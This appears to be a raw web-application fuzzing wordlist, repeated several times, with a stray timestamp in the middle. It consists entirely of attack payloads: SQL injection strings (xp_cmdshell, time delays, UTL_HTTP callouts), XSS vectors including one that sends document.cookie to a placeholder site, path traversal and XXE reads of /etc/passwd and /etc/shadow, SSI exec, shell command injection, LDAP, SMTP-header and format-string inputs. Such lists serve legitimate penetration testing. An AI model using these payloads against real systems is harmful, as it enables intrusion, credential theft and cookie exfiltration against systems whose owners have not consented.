%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x & & id & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & &#0000060 < &#000060 < &#00060 < &#0060 < &#060 < 
 

 
 
 &#60 < &#X000003C < &#X000003c < &#X00003C < &#X00003c < &#X0003C < &#X0003c < &#X003C < &#X003c < &#X03C < &#X03c < &#X3C < &#X3c < &#x000003C < &#x000003c < &#x00003C < &#x00003c < &#x0003C < &#x0003c < &#x003C < &#x003c < &#x03C < &#x03c < &#x3C < &#x3c < &LT < ' '%20OR &id &lt < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <>"'%;)(&+ &ltscript&gtalert(document.cookie);&ltscript&gtalert &ltscript&gtalert(document.cookie);/script ";id" ' ' (select top 1 ' -- ' ; ' UNION ALL SELECT ' UNION SELECT ' or ''=' ' or '1'='1 ' or '1'='1'-- ' or 'x'='x ' or (EXISTS) ' or 0=0 # ' or 0=0 -- ' or 1 in (@@version)-- ' or 1=1 or ''=' ' or 1=1-- ' or a=a-- ' or uid like '% ' or uname like '% ' or user like '% ' or userid like '% ' or username like '% '%20or%201=1 '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '';!--"XSS=&{()} ') or ('a'='a '-- '; exec master..xp_cmdshell '; exec xp_regread '; waitfor delay '0:30:0'-- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))///SCRIPT!--SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT=&{} ';shutdown-- 'scriptalert(document.cookie);/script 'scriptalert(document.cookie)/script 'hi' or 'x'='x'; 'or select * 'sqlattempt1 '||UTL_HTTP.REQUEST '||Utl_Http.request('http://yourservername') from dual-- ( (') (sqlattempt2) ) )))))))))) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| + +%00 ,@variable - -- --'; --sp_password -1 -1.0 -2 -20 -268435455 ..%%35%63 ..%%35c ..%25%35%63 ..%255c ..%5c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 ..%u2216 ../ ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ..\ ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / /%00/ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow // //* /etc/passwd /etc/shadow /index.html|id| 0 0 or 1=1 00 0xfffffff 1 1 or 1 in (@@version)-- 1 or 1=1-- 1.0 1; waitfor delay '0:30:0'-- 1;SELECT%20* 1||Utl_Http.request('http://yourservername') from dual-- 2 2147483647 268435455 65536 :response.write 111111 ; ; ping 127.0.0.1 ; ;/usr/bin/id\n ;echo 111111 ;id ;id; ;id\n ;id| ;ls -la ;system('/usr/bin/id') ;system('cat%20/etc/passwd') ;system('id') ;|/usr/bin/id| script / script ! ![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]] ![CDATA[scriptvar n=0;while(true){n++;}/script]] /foo scriptalert("XSS");///script "'%;)(&+ ? ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////dev/random"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/passwd"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/shadow"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file://c:/boot.ini"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[' or 1=1 or ''=']]/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo HTML xmlns:xss?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"xss:xssXSS/xss:xss/HTML IMG """SCRIPTalert("XSS")/SCRIPT" IMG DYNSRC="javascript:alert('XSS')" IMG LOWSRC="javascript:alert('XSS')" IMG SRC="  javascript:alert('XSS');" IMG SRC="jav ascript:alert('XSS');" IMG SRC="jav	ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="javascript:alert('XSS')" IMG SRC="javascript:alert('XSS');" IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 IMG SRC=javascript:alert('XSS') IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 IMG SRC=JaVaScRiPt:alert('XSS') IMG SRC=`javascript:alert("'XSS'")` IMG SRC=javascript:alert("XSS") IMG SRC=javascript:alert('XSS') IMG SRC=javascript:alert(String.fromCharCode(88,83,83)) IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)' IMG%20SRC='javasc ript:alert(document.cookie)' IMG%20SRC='javascript:alert(document.cookie)' foo/foo name','')); phpinfo(); exit;/*/name scriptalert("XSS")/script scriptalert(document.cookie)/script xml ID="xss"IB<IMG SRC="javas!-- --cript:alert('XSS')">/B/I/xmlSPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xml ID=IXC![CDATA[IMG SRC="javas]]![CDATA[cript:alert('XSS');"]] xml SRC="xsstest.xml" ID=I/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xssscriptalert('XSS')/script/vulnerable youremail%0aBcc:youremail youremail%0aCc:youremail youremail%0d%0aBcc:youremail youremail%0d%0aCc:youremail = =' =-- =; ?x= ?x=" ?x= ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| FALSE NULL PRINT PRINT @@variable TRUE XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` ['] ['] \ \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \0 \00 \00\00 \00\00\00 \0\0 \0\0\0 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \n/usr/bin/id; \n/usr/bin/id\n \n/usr/bin/id| \nid; \nid\n \nid| \nnetstat -a%\n \t \u003C \u003c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * \x3C \x3D \x27 \x3D \x3B' \x3c ^' ^' ` `/usr/bin/id` `dir` `id` `perl -e 'print ".%p" x 80'`%n `ping 127.0.0.1` a);/usr/bin/id a);/usr/bin/id; a);/usr/bin/id| a);id a);id; a);id| a)|/usr/bin/id a)|/usr/bin/id; a)|id a)|id; a;/usr/bin/id a;/usr/bin/id; a;/usr/bin/id| a;id a;id; a;id| http://yourservername/ id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- response.write 111111 something%00html update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y xsstest xsstest%00"' {'} |/usr/bin/id |/usr/bin/id| |id |id; |id| |ls |ls -la |nid\n |usr/bin/id\n || || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & ||/usr/bin/id; ||/usr/bin/id| }
ert2017-02-27 19:07:44
! !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() " " or "a"="a " or "x"="x " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- "' or 1 --'" ") or ("a"="a "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////dev/random""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////etc/passwd""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[' or 1=1 or ''=']]/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo" "HTML xmlns:xss?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""xss:xssXSS/xss:xss/HTML" "xml ID=""xss""IBIMG SRC=""javas!-- --cript:alert('XSS')""/B/I/xmlSPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN" "xml ID=IXC![CDATA[IMG SRC=""javas]]![CDATA[cript:alert('XSS');""]]" "script" "scriptalert(1)/script "scriptdocument.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie/script "xxxPyyy "\t" # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %01%02%03%04%0a%0d%0aADSF %08x %0A/usr/bin/id %0A/usr/bin/id%0A %0Aid %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %oa ping -n 30 127.0.0.1 %0a %0a id %0a %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+youremail%0aRCPT+TO:+youremail%0aDATA%0aFrom:+youremail%0aTo:+youremail%0aSubject:+tst%0afoo%0a%2e%0a %0d %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+youremail%0d%0aRCPT+TO:+youremail%0d%0aDATA%0d%0aFrom:+youremail%0d%0aTo:+youremail%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a %0d%0aX-Injection-Header:%20AttackValue %20 %20$(sleep%2050) %20'sleep%2050' %20d %20n %20s %20x %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %2500 %250a %26 %27%20or%201=1 %28 %29 %2A %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %60 %7C %7f %99999999999s %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %ff %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x & & id & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & &#0000060 < &#000060 < &#00060 < &#0060 < &#060 < 
 

 
 
 &#60 < &#X000003C < &#X000003c < &#X00003C < &#X00003c < &#X0003C < &#X0003c < &#X003C < &#X003c < &#X03C < &#X03c < &#X3C < &#X3c < &#x000003C < &#x000003c < &#x00003C < &#x00003c < &#x0003C < &#x0003c < &#x003C < &#x003c < &#x03C < &#x03c < &#x3C < &#x3c < &LT < ' '%20OR &id &lt < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <>"'%;)(&+ &ltscript&gtalert(document.cookie);&ltscript&gtalert &ltscript&gtalert(document.cookie);/script ";id" ' ' (select top 1 ' -- ' ; ' UNION ALL SELECT ' UNION SELECT ' or ''=' ' or '1'='1 ' or '1'='1'-- ' or 'x'='x ' or (EXISTS) ' or 0=0 # ' or 0=0 -- ' or 1 in (@@version)-- ' or 1=1 or ''=' ' or 1=1-- ' or a=a-- ' or uid like '% ' or uname like '% ' or user like '% ' or userid like '% ' or username like '% '%20or%201=1 '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '';!--"XSS=&{()} ') or ('a'='a '-- '; exec master..xp_cmdshell '; exec xp_regread '; waitfor delay '0:30:0'-- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))///SCRIPT!--SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT=&{} ';shutdown-- 'scriptalert(document.cookie);/script 'scriptalert(document.cookie)/script 'hi' or 'x'='x'; 'or select * 'sqlattempt1 '||UTL_HTTP.REQUEST '||Utl_Http.request('http://yourservername') from dual-- ( (') (sqlattempt2) ) )))))))))) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| + +%00 ,@variable - -- --'; --sp_password -1 -1.0 -2 -20 -268435455 ..%%35%63 ..%%35c ..%25%35%63 ..%255c ..%5c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 ..%u2216 ../ ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ..\ ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / /%00/ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow // //* /etc/passwd /etc/shadow /index.html|id| 0 0 or 1=1 00 0xfffffff 1 1 or 1 in (@@version)-- 1 or 1=1-- 1.0 1; waitfor delay '0:30:0'-- 1;SELECT%20* 1||Utl_Http.request('http://yourservername') from dual-- 2 2147483647 268435455 65536 :response.write 111111 ; ; ping 127.0.0.1 ; ;/usr/bin/id\n ;echo 111111 ;id ;id; ;id\n ;id| ;ls -la ;system('/usr/bin/id') ;system('cat%20/etc/passwd') ;system('id') ;|/usr/bin/id| script / script ! ![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]] ![CDATA[scriptvar n=0;while(true){n++;}/script]] /foo scriptalert("XSS");///script "'%;)(&+ ? ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////dev/random"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/passwd"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/shadow"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file://c:/boot.ini"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[' or 1=1 or ''=']]/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo HTML xmlns:xss?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"xss:xssXSS/xss:xss/HTML IMG """SCRIPTalert("XSS")/SCRIPT" IMG DYNSRC="javascript:alert('XSS')" IMG LOWSRC="javascript:alert('XSS')" IMG SRC="  javascript:alert('XSS');" IMG SRC="jav ascript:alert('XSS');" IMG SRC="jav	ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="javascript:alert('XSS')" IMG SRC="javascript:alert('XSS');" IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 IMG SRC=javascript:alert('XSS') IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 IMG SRC=JaVaScRiPt:alert('XSS') IMG SRC=`javascript:alert("'XSS'")` IMG SRC=javascript:alert("XSS") IMG SRC=javascript:alert('XSS') IMG SRC=javascript:alert(String.fromCharCode(88,83,83)) IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)' IMG%20SRC='javasc ript:alert(document.cookie)' IMG%20SRC='javascript:alert(document.cookie)' foo/foo name','')); phpinfo(); exit;/*/name scriptalert("XSS")/script scriptalert(document.cookie)/script xml ID="xss"IB<IMG SRC="javas!-- --cript:alert('XSS')">/B/I/xmlSPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xml ID=IXC![CDATA[IMG SRC="javas]]![CDATA[cript:alert('XSS');"]] xml SRC="xsstest.xml" ID=I/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xssscriptalert('XSS')/script/vulnerable youremail%0aBcc:youremail youremail%0aCc:youremail youremail%0d%0aBcc:youremail youremail%0d%0aCc:youremail = =' =-- =; ?x= ?x=" ?x= ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| FALSE NULL PRINT PRINT @@variable TRUE XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` ['] ['] \ \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \0 \00 \00\00 \00\00\00 \0\0 \0\0\0 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \n/usr/bin/id; \n/usr/bin/id\n \n/usr/bin/id| \nid; \nid\n \nid| \nnetstat -a%\n \t \u003C \u003c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * \x3C \x3D \x27 \x3D \x3B' \x3c ^' ^' ` `/usr/bin/id` `dir` `id` `perl -e 'print ".%p" x 80'`%n `ping 127.0.0.1` a);/usr/bin/id a);/usr/bin/id; a);/usr/bin/id| a);id a);id; a);id| a)|/usr/bin/id a)|/usr/bin/id; a)|id a)|id; a;/usr/bin/id a;/usr/bin/id; a;/usr/bin/id| a;id a;id; a;id| http://yourservername/ id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- response.write 111111 something%00html update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y xsstest xsstest%00"' {'} |/usr/bin/id |/usr/bin/id| |id |id; |id| |ls |ls -la |nid\n |usr/bin/id\n || || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & ||/usr/bin/id; ||/usr/bin/id| } ! !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() " " or "a"="a " or "x"="x " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- "' or 1 --'" ") or ("a"="a "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////dev/random""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////etc/passwd""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[' or 1=1 or ''=']]/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo" "HTML xmlns:xss?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""xss:xssXSS/xss:xss/HTML" "xml ID=""xss""IBIMG SRC=""javas!-- --cript:alert('XSS')""/B/I/xmlSPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN" "xml ID=IXC![CDATA[IMG SRC=""javas]]![CDATA[cript:alert('XSS');""]]" "script" "scriptalert(1)/script "scriptdocument.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie/script "xxxPyyy "\t" # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %01%02%03%04%0a%0d%0aADSF %08x %0A/usr/bin/id %0A/usr/bin/id%0A %0Aid %0Aid%0A %0a 